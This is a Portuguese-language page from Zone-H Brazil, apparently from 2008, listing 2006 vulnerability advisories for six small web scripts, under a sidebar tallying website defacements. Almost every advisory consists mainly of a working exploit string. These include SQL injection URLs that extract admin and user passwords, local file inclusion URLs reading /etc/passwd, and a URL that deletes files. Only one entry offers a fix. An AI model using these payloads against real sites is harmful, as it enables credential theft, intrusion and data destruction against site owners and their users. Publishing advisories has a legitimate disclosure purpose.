Zone-H
Home arrow Avisos de Segurança
03 de December de 2008
 
 
Ataques desta semana
O.S.  Defs.  %
Linux  4747  66.95%
Win 2003  1457  20.55%
Solaris 9/10  351  4.95%
FreeBSD  229  3.23%
Win 2000  164  2.31%
Other  142  2.00%

Total de ataques: 7090 dos quais 3494 único(s) no ip e 3596 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Área de Download
Zone-H.org
Área de download
Avisos de Segurança
Property Pro: Injeção de Codigos SQL Imprimir E-mail
Avaliação do Usuário: / 0
Por Raphael Martins (Ashiyakuza)   
13 de November de 2006
Nome do Script: Property Pro
Site do script: www.property-pro.co.uk
Versão Afetada: 1.0

Encontrado por ajann
Email: ajannhwt [at] hotmail.com

Exploração:

http://[target]/[path]/admin/

Usuário: ' union select 0,0 from admin
 
ContentNow: Múltiplas Falhas Remotas Imprimir E-mail
Avaliação do Usuário: / 0
Por Raphael Martins (Ashiyakuza)   
13 de November de 2006
Nome do Script: ContentNow
Site do script: http://www.contentnow.mf4k.de/
Versão Afetada: 1.30
Encontrado por r0ut3r
Email: writ3r [at] gmail.com

Exploração(Inclusão de Arquivo Local):

http://localhost/cn/edit.php?lang=../../../../etc/passwd%00
http://localhost/cn/image.php?lang=../../../../etc/passwd%00
http://localhost/cn/upload.php?lang=../../../../etc/passwd%00

Exploração(Upload de arquivo):

http://localhost/cn/upload.php?path=/&cid=&type=file&single=false&folder=&lang=en

Obs.:Você precisa ter permissão de escrita no diretório a ser escolhido como destino

Exploração(remoção de arquivo):
http://localhost/contentnow_130/cn/upload.php?path=[Diretorio]&cid=&type=file&folder=&lang=en&delfile=[Arquivo]&single=false

Como Consertar:

Restrição de acesso ao diretório CN com uso do .htaccess
 
Munch Pro: Injeção de Codigos SQL Imprimir E-mail
Avaliação do Usuário: / 0
Por Raphael Martins (Ashiyakuza)   
12 de November de 2006
Nome do Script: Munch Pro
Site do script: http://isystems.7host.com/isystems/
Versão Afetada: 1.0

Encontrado por ajann
Email: ajannhwt [at] hotmail.com

Exploração:

http://www.target.com/[path]/switch.asp?pg=subMenu&catid=-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%2
 
ASPPortal: Injeção de Codigos SQL Imprimir E-mail
Avaliação do Usuário: / 0
Por Raphael Martins (Ashiyakuza)   
12 de November de 2006
Nome do Script: ASPPortal
Site do script: http://www.aspportal.net
Versão Afetada: 4.0.0 e anteriores

Encontrado por ajann
Email: ajannhwt [at] hotmail.com

Exploração:

http://www.target.com/default1.asp?Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20
 
NuCommunity: Injeção de Codigos SQL Imprimir E-mail
Avaliação do Usuário: / 0
Por Raphael Martins (Ashiyakuza)   
12 de November de 2006
Nome do Script: NuCommunity
Site do script: http://www.dynamicdataworx.com/Sales/NuCommunity.asp
Versão Afetada: 1.0

Encontrado por ajann
Email: ajannhwt [at] hotmail.com

Exploração:

http://target/[path]/cl_CatListing.asp?cl_cat_ID=-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20
http://target/[path]/cl_CatListing.asp?cl_cat_ID=-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20
 
NuSchool: Injeção de Codigos SQL Imprimir E-mail
Avaliação do Usuário: / 0
Por Raphael Martins (Ashiyakuza)   
11 de November de 2006
Nome do Script: NuSchool
Site do script: http://www.dynamicdataworx.com/Sales/NuSchool.asp
Versão Afetada: 1.0

Encontrado por ajann
Email: ajannhwt [at] hotmail.com

Exploração:

http://target/[path]/CampusNewsDetails.asp?NewsID=-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20
 
<< Início < Anterior 1 2 3 4 5 6 7 8 9 Próximo > Fim >>

Resultados 131 - 156 de 234
 
Top! Top!